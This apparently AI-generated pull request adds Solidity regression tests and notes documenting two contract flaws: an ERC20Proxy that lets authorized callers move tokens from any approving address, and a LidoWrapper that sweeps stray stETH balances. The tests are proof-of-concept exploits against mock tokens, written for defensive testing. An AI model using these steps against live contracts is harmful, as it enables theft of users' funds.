### PR TITLE
Add security regression tests for ERC20Proxy and LidoWrapper

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -20,6 +20,16 @@
 - Tool: `slither`
 - Result: Uses low-level calls to transfer ETH to arbitrary receiver, allowing reentrancy before event emission.
 
+## ERC20Proxy arbitrary token transfer
+- Severity: High
+- Test: `forge test --match-path test/solidity/Security/ERC20ProxyArbitraryFrom.t.sol`
+- Result: Authorized callers can move tokens from any approved address, enabling theft if proxy is approved by victims.
+
+## LidoWrapper sweeps existing stETH balance
+- Severity: Medium
+- Test: `forge test --match-path test/solidity/Security/LidoWrapperSweep.t.sol`
+- Result: `wrapStETHToWstETH` unwraps entire contract balance, letting callers steal stray stETH deposits.
+
 | Date | Description | Severity | Result |
 |------|-------------|----------|--------|
 | 2025-02-14 | Unauthorized PancakeV3 swap callback invocation | High | Reverted with `UniswapV3SwapCallbackUnknownSource` |

--- a/test/solidity/Security/ERC20ProxyArbitraryFrom.t.sol
+++ b/test/solidity/Security/ERC20ProxyArbitraryFrom.t.sol
@@ -1,0 +1,28 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.17;
+
+import "forge-std/Test.sol";
+import { ERC20Proxy } from "lifi/Periphery/ERC20Proxy.sol";
+import { MockERC20 } from "solmate/test/utils/mocks/MockERC20.sol";
+
+contract ERC20ProxyArbitraryFromTest is Test {
+    ERC20Proxy proxy;
+    MockERC20 token;
+    address victim = address(0x1);
+    address attacker = address(0x2);
+
+    function setUp() public {
+        proxy = new ERC20Proxy(address(this));
+        proxy.setAuthorizedCaller(address(this), true);
+        token = new MockERC20("Mock", "MCK", 18);
+        token.mint(victim, 100 ether);
+        vm.prank(victim);
+        token.approve(address(proxy), type(uint256).max);
+    }
+
+    function testAuthorizedCallerCanTransferFromAnyAddress() public {
+        proxy.transferFrom(address(token), victim, attacker, 10 ether);
+        assertEq(token.balanceOf(attacker), 10 ether);
+    }
+}
+

--- a/test/solidity/Security/LidoWrapperSweep.t.sol
+++ b/test/solidity/Security/LidoWrapperSweep.t.sol
@@ -1,0 +1,59 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.17;
+
+import "forge-std/Test.sol";
+import { LidoWrapper, IStETH } from "lifi/Periphery/LidoWrapper.sol";
+import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
+
+contract MockWstETH is ERC20 {
+    constructor() ERC20("Wrapped stETH", "wstETH") {}
+    function mint(address to, uint256 amount) external {
+        _mint(to, amount);
+    }
+}
+
+contract MockStETH is ERC20, IStETH {
+    MockWstETH public wst;
+    constructor(MockWstETH _wst) ERC20("stETH", "stETH") {
+        wst = _wst;
+    }
+    function mint(address to, uint256 amount) external {
+        _mint(to, amount);
+    }
+    function wrap(uint256 amount) external override returns (uint256 unwrappedAmount) {
+        wst.transferFrom(msg.sender, address(this), amount);
+        _mint(msg.sender, amount);
+        return amount;
+    }
+    function unwrap(uint256 amount) external override returns (uint256 wrappedAmount) {
+        _burn(msg.sender, amount);
+        wst.mint(msg.sender, amount);
+        return amount;
+    }
+}
+
+contract LidoWrapperSweepTest is Test {
+    LidoWrapper wrapper;
+    MockStETH steth;
+    MockWstETH wsteth;
+    address victim = address(0x1);
+
+    function setUp() public {
+        wsteth = new MockWstETH();
+        steth = new MockStETH(wsteth);
+        wrapper = new LidoWrapper(address(steth), address(wsteth), address(this));
+
+        steth.mint(victim, 50 ether);
+        vm.prank(victim);
+        steth.transfer(address(wrapper), 50 ether);
+
+        steth.mint(address(this), 10 ether);
+        steth.approve(address(wrapper), type(uint256).max);
+    }
+
+    function testWrapSweepsExistingBalance() public {
+        wrapper.wrapStETHToWstETH(10 ether);
+        assertEq(wsteth.balanceOf(address(this)), 60 ether);
+    }
+}
+


### PR DESCRIPTION
## Summary
- add tests exposing arbitrary token transfer via ERC20Proxy
- add tests showing LidoWrapper can sweep stray stETH deposits
- document tested vectors in TestedVectors.md

## Testing
- `forge test --match-path test/solidity/Security/ERC20ProxyArbitraryFrom.t.sol`
- `forge test --match-path test/solidity/Security/LidoWrapperSweep.t.sol`


------
https://chatgpt.com/codex/tasks/task_e_68a8e582c6d8832da05fa9085904114f